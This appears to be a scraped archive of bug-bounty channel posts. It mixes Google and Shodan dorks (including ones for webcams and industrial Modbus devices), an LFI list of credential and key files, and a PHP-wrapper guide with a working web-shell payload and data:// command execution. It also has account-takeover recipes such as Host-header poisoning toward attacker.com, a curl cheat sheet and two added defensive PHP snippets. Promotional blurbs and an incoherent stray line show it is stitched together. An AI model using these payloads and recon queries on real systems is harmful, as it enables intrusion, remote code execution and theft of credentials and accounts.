Bug Bounty - GitBook

Post archive
🚀 Google Dorks for Bug Bounty & Web Security! 🔍 A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting! 🎯 🔥 Broad Domain Search (Exclude Common Subdomains)
site:example.com -www -shop -share -ir -mfa
🔥 PHP Files with Parameters
site:example.com ext:php inurl:?
🔥 API Endpoints Discovery
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
🔥 Juicy Extensions (Sensitive Files)
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
🔥 High-Value InURL Keywords
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
🔥 Finding Server Errors
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
💥 Master these dorks to find misconfigurations, sensitive data leaks, and security flaws! 📢 #BugBounty #GoogleDorks #OSINT #EthicalHacking #Pentesting #CyberSecurity

A Comprehensive Repo for Shodan Dorks This GitHub repository provides a range of Shodan dorks to find vulnerabilities and configuration issues in various types of devices such as webcams, routers, and servers. • Repository: https://github.com/nullfuzz-pentest/shodan-dorks #infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork

Grep tips for Javascript Analysis
💡Note: cat * is for all files from the folder.
🟣Extracting JavaScript Files from recursive Directories
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
🟣Searching for API Keys and Secrets
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
🟣Detecting Dangerous Function Calls
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
🟣Checking for URL Manipulation
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
🟣Searching for Cross-Origin Requests
grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
🟣Analyzing postMessage Usage
cat * | grep -r "postMessage"
🟣Finding Hardcoded URLs or Endpoints
cat * | grep -rE "https?://|www\."
🟣Locating Debugging Information
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
🟣Investigating User Input Handling
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #JS

🔐💻 The world of security, a darkness that must be understood… This is where the line between intrusion and protection is just a few lines of code... where every bug can be a gateway to complete access to a system. We are here to identify these gateways, examine them, and if necessary… pass through them. Our family: https://t.me/cybr_hant

https://t.me/cybr_hant The one I wanted wasn't coming either; well, give an explanation, I only went for a timed exchange.

ViperNull 🕷 Always stay one step ahead of threats with us - Specialized analysis of threats and attacks - Books, videos, podcasts and practical resources - Focus on defensive security and familiarity with professional tools; blue team, red team and network topics. Join now: https://t.me/ViperNull

🚀 LFI - Interesting Linux files
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the file descriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp

🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE
⚠️ Most hackers stop at reading logs. The elite use PHP wrappers to turn LFI into remote code execution. This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇
🎯 Why PHP Wrappers Matter in Bug Bounty
PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.
As attackers, we can abuse these wrappers to:
✅ Read raw PHP source (even when .php is auto-appended)
✅ Bypass execution to leak secrets
✅ Chain into full RCE
✅ Abuse legacy or misconfigured server behavior
Commonly used wrappers:
▶️ php://filter
▶️ php://input
▶️ php://memory
▶️ data://
▶️ expect://
▶️ zip://
▶️ phar://
🧬 Using php://filter for Source Code Disclosure
This is the most useful wrapper for LFI. Payload:
php://filter/read=convert.base64-encode/resource=index
Why it works: ✅ read=convert.base64-encode prevents execution of the PHP code ✅ Base64 output = raw, readable source Example:
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config
Decode result:
echo 'PD9waHAK...base64...' | base64 -d
Now you see source code, credentials, internal logic, API keys, etc.
🔧 Other Useful PHP Wrappers
1️⃣ php://input
Reads raw POST data. Good for injecting code during file inclusions via POST.
<?php include('php://input'); ?>
Then POST:
POST /index.php
<?php system($_GET['cmd']); ?>
✅ Shell access via cmd parameter.
2️⃣ expect:// (if available)
Allows direct execution of system commands.
include('expect://ls');
⚠️ Rare but deadly if enabled.
3️⃣ data://
Inline file input using base64 or plaintext. Example:
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');
🟡 Executes: system('whoami')
4️⃣ zip://
✅ Targets ZIP files as file systems.
✅ Abuse via LFI to include malicious entries.
Structure:
zip://path/to/archive.zip#file_inside.txt
Use this with file upload + LFI combo.
5️⃣ phar://
Deserializes metadata → use with Object Injection + LFI. Upload malicious PHAR:
phar://path/to/phar_file
If unserialize() is called on a phar wrapper, it can lead to RCE.
🔍 Fuzzing PHP Files Before Exploiting
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php
Watch for:
200 → exists and renders
403/302 → access denied, but still includable via LFI
📁 Standard Inclusion vs. Filtered Inclusion
Including via:
?file=config
🟡 Executes file, no output if file has no HTML.
Using filter:
?file=php://filter/read=convert.base64-encode/resource=config
🟡 Returns base64 source code.
🧪 Decode & Analyze the Source Code
echo 'base64-encoded-content' | base64 -d
Look for:
✅ $db_password, $admin_pass
✅ API endpoints
✅ Sensitive routes
✅ Hardcoded JWT secrets or keys
💣 Advanced Chaining → From LFI to RCE
1. Read source via php://filter
2. Find upload paths or SSRF endpoints
3. Upload malicious phar:// file
4. Trigger inclusion → RCE
This chain has been used in real-world bounty reports.
🧱 Defense Tips for Developers:
- Disable allow_url_include, allow_url_fopen
- Avoid dynamic include($_GET['page'])
- Use strict whitelists
- Harden php.ini configs
- Monitor suspicious access patterns
🧠 Daily hacking insights 🛠 Payloads & Tools 🐞 Real bug bounty techniques ⚔️ Hands-on exploitation walkthroughs
👍 Like this post if it helped 🔁 Share to boost your hacker circle
🔗 Github link : github.com/cybersecplayground...
#lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground
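The developer tips above, as an added example that is not from the original post or its linked repository: the dynamic include pattern the guide warns about next to an allowlisted replacement with a logging hook. The page names and the pages/ directory are hypothetical.

```php
<?php
// Added example, not from the original post: the dynamic-include pattern the
// guide warns about beside an allowlisted replacement. Page names are hypothetical.

// VULNERABLE: ?file= flows straight into include(). Appending ".php" does not
// help, because php://filter/.../resource=config.php is still a wrapper URL.
function include_page_vulnerable(string $file): void
{
    include $file . '.php';
}

// HARDENED: the request value is only ever a key into a fixed map, so wrappers,
// traversal sequences and null bytes never reach the filesystem layer.
const PAGES = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];

function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/pages/' . PAGES[$requested]);
    // Belt and braces: even a mapped file must resolve inside the pages directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Detection hook for the "monitor suspicious access patterns" tip: flags values
// that name a stream wrapper, traverse directories, or carry a null byte.
function looks_like_inclusion_probe(string $value): bool
{
    return (bool) preg_match('#^(php|data|expect|zip|phar|file|ftp|https?):|\.\./|\x00#i', $value);
}

function include_page_safe(string $requested): void
{
    $path = resolve_page($requested);
    if ($path === null) {
        if (looks_like_inclusion_probe($requested)) {
            error_log('LFI probe rejected: ' . substr($requested, 0, 200));
        }
        http_response_code(404);
        return;
    }
    include $path;
}

// allow_url_fopen and allow_url_include cannot be changed with ini_set() at
// runtime; set them in php.ini as the post recommends:
//   allow_url_fopen = Off
//   allow_url_include = Off
include_page_safe($_GET['page'] ?? 'home');
```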

Firing 8 Account Takeover Methods
🔴 Unicode Normalization Issue
1. Victim account: victim@gmail.com
2. Create an account using Unicode, example: vićtim@gmail.com (here ć is a Unicode character)
✍️ List of Unicode characters: 🔗 Link
Note: check where verification isn't required.
🔴 Authorization Issue
1. Change the email of Account A and put in email B.
2. Check the confirmation mail in account B.
3. Open the confirmation mail from account C. Account C is taken over.
🔴 Reusing Reset Token
If the target allows you to reuse the reset link, then hunt for more reset links via gau, wayback or urlscan.io.
🔴 Pre Account Takeover
1. Sign up using the normal signup form as a hacker, but the hacker has no verification link.
2. Then the victim signs up using OAuth.
3. Verification bypass: now the attacker can log in to the victim's account without the verification link, with the password he entered while registering.
🔴 CORS Misconfiguration to Account Takeover
1. Check the API: does any endpoint expose an access token/session/secret/fingerprint?
2. If yes, check for CORS misconfiguration: does it allow us to fetch data from the target?
3. Make a payload to fetch the data and replace headers, and boom.
🔴 CSRF to ATO
If profile modification with cookie-based authentication doesn't generate any token:
1. Open Account A, change and put in an email that you own, click save, intercept the request and generate a CSRF PoC.
2. If auth is fully cookie based then you don't have to modify anything; send the CSRF file to the victim.
3. If it requires a UUID/UserID or unique token it becomes hard to do, but that doesn't mean it is secure; just start playing with the target. Hint: the password reset page helps many times for UUID/GUID and UserID.
🔴 Host Header Injection
Well, in this case there are 4 ways to do that.
1. Click reset password, change the Host header.
2. Or change a proxy header, ex: X-Forwarded-For: attacker.com
3. Or change the Host, Referer and Origin headers at once to attacker.com
4. Click reset, then click resend mail and do all 3 methods above.
🔴 Response Manipulation
1. Code manipulation: * to 200 OK
2. Code and body manipulation: code * to 200 OK, body * to {"success":true} or {}
It works when JSON is being used to transfer and receive data.
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #ATO
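The Unicode normalization issue in method 1 above, from the defender's side, as an added example that is not from the original post: an email canonicalization check that refuses a look-alike registration instead of letting it collide with the victim's account. It assumes the ext-intl (Normalizer) and mbstring extensions; the account list is constructed for illustration.

```php
<?php
// Added example, not from the original post: a server-side check for the
// Unicode look-alike collision in method 1 above. Needs ext-intl (Normalizer)
// and mbstring; the account list is constructed for illustration.

// Reduce an address to what a lenient system would "see": lower-case,
// compatibility-decompose (ć -> c + U+0301, fullwidth ａ -> a), drop the marks.
function canonical_email(string $email): string
{
    $email = mb_strtolower(trim($email), 'UTF-8');
    $decomposed = Normalizer::normalize($email, Normalizer::FORM_KD);
    if ($decomposed === false) {
        return $email;   // invalid UTF-8: leave as-is for later input validation
    }
    return preg_replace('/\p{Mn}+/u', '', $decomposed);
}

// True when the two addresses differ as typed but collapse to one canonical form.
function is_lookalike(string $existing, string $submitted): bool
{
    return $existing !== $submitted
        && canonical_email($existing) === canonical_email($submitted);
}

// Registration policy: an exact match is an ordinary duplicate; a look-alike of
// an existing account is refused instead of being silently merged with it.
function registration_decision(array $existingAccounts, string $submitted): string
{
    foreach ($existingAccounts as $account) {
        if ($account === $submitted) {
            return 'duplicate';
        }
        if (is_lookalike($account, $submitted)) {
            return 'reject-lookalike';
        }
    }
    return 'allow';
}

// Constructed sample data: the pair from the post, plus an unrelated address.
$accounts = ['victim@gmail.com'];
foreach (["vi\u{0107}tim@gmail.com", 'victim@gmail.com', 'someone@gmail.com'] as $candidate) {
    printf("%-28s -> %s\n", $candidate, registration_decision($accounts, $candidate));
}
```

The same canonical form is what the lookup on login and on "resend verification" should compare against, and the verification mail itself should only ever go to the address exactly as it was typed.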

Shodan Dorks for OSINT, Recon and Bug Bounty
📸 Exposed Webcams
Finds IP cams running webcamXP software
• Example: http.title:"webcamXP"
🧑‍💻 Open FTP Servers
Finds FTP servers that allow anonymous login
• Example (Anonymous login access): port:21 anonymous
💻 Outdated Operating Systems
Finds devices running Windows 7, for example
• Example: os:"Windows 7"
🌐 Misconfigured MongoDB Databases
Finds exposed MongoDB instances without authentication
• Example: product:"MongoDB" port:27017
🔐 Exposed Login Panels
Identifies admin login portals
• Example: http.title:"Admin Login"
🧭 Specific Geolocation Targets
Finds services exposed in a specific country
• Example: port:22 country:"IN"
🧨 Apache Servers with Expired SSL in the US
Finds Apache web servers with expired SSL certs in the US
• Example: product:"Apache httpd" ssl:"expired" country:"US"
🧪 Devices Vulnerable to CVEs (e.g., Confluence CVE-2021-26084)
Finds potentially vulnerable Confluence servers
• Example: http.html:"Atlassian Confluence" port:8090
🎛 ICS/SCADA Devices
Detects Modbus protocol on industrial systems
• Example: port:502 name:"modbus"
Subdomain Enumeration with Favicon using Shodan:
Shodan Search Query Fundamentals:
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork

If you come across a WordPress website, fuzz for these files and patterns:
.env.bak
.env.php
wp-config-backup.php
wp-config.php.save
wp-config.php~
wp-config.php.old
error_log.log
php_error.log
wp.sql
db.sql
wpbackup.sql
mysql_backup.sql
{TARGET}.zip
{TARGET}-backup.zip
You can generate wordlists with the patterns above or any pattern you want using Fback: https://github.com/Spix0r/Fback #InfoSec #CyberSecurity #Hacking #Course #bugbounty #wordpress #Fuzzing

List of the most useful curl commands! 🎯
Most Useful curl Commands for Downloading and Interacting with URLs (With Emoji for Better Understanding)
# 1️⃣ Basic GET Request
Use curl to fetch the content of a URL.
curl https://example.com
# 2️⃣ Save to a File
Use -o to save the downloaded content to a file.
curl -o filename.html https://example.com
# 3️⃣ Display Response Headers
Use -I to only fetch the response headers.
curl -I https://example.com
# 4️⃣ Follow Redirects
Use -L to follow redirects (if the URL redirects you).
curl -L https://example.com
# 5️⃣ Download a File (with Resume)
Use -C to resume a partially downloaded file.
curl -C - -O https://example.com/largefile.zip
# 6️⃣ Show Progress
Use -# to show a progress bar during download.
curl -# -O https://example.com/largefile.zip
# 7️⃣ Download a Torrent
Use -o to download and save a .torrent file.
curl -o ubuntu-22.04.iso.torrent https://releases.ubuntu.com/22.04/ubuntu-22.04.5-live-server-amd64.iso.torrent
# 8️⃣ Send a POST Request
Use -X POST to send data to a server (e.g., form submission).
curl -X POST -d "username=user&password=pass" https://example.com/login
# 9️⃣ Include Custom Headers
Use -H to add custom headers to your request.
curl -H "Authorization: Bearer TOKEN" https://api.example.com/data
# 🔟 Make a PUT Request
Use -X PUT to send data to update a resource.
curl -X PUT -d '{"name": "John"}' -H "Content-Type: application/json" https://example.com/update
# 🔒 Send Data with Authentication
Use -u to pass authentication credentials.
curl -u username:password https://example.com
# 1️⃣1️⃣ Save Cookies
Use -c to save cookies to a file.
curl -c cookies.txt https://example.com
# 1️⃣2️⃣ Use Cookies from a File
Use -b to send cookies from a saved file.
curl -b cookies.txt https://example.com
# 1️⃣3️⃣ Limit Download Speed
Use --limit-rate to limit download speed.
curl --limit-rate 100K -O https://example.com/largefile.zip
# 1️⃣4️⃣ Show Full Request & Response
Use -v for verbose output (request and response details).
curl -v https://example.com
# 1️⃣5️⃣ Send Data as JSON
Use -H and -d to send data as JSON.
curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' https://example.com/api
# 1️⃣6️⃣ Access a URL with SSL Verification Disabled
Use -k or --insecure to skip SSL certificate verification (not recommended for production).
curl -k https://example.com
# 1️⃣7️⃣ Limit Request Time
Use --max-time to limit the total request time.
curl --max-time 10 https://example.com
# 1️⃣8️⃣ Download Multiple Files
Use -O to download multiple files at once.
curl -O https://example.com/file1.zip -O https://example.com/file2.zip
# 1️⃣9️⃣ Get Information About the URL
Use -I to fetch only headers for a URL.
curl -I https://example.com
# 2️⃣0️⃣ Use a Proxy
Use -x to route your request through a proxy.
curl -x proxy.example.com:8080 https://example.com
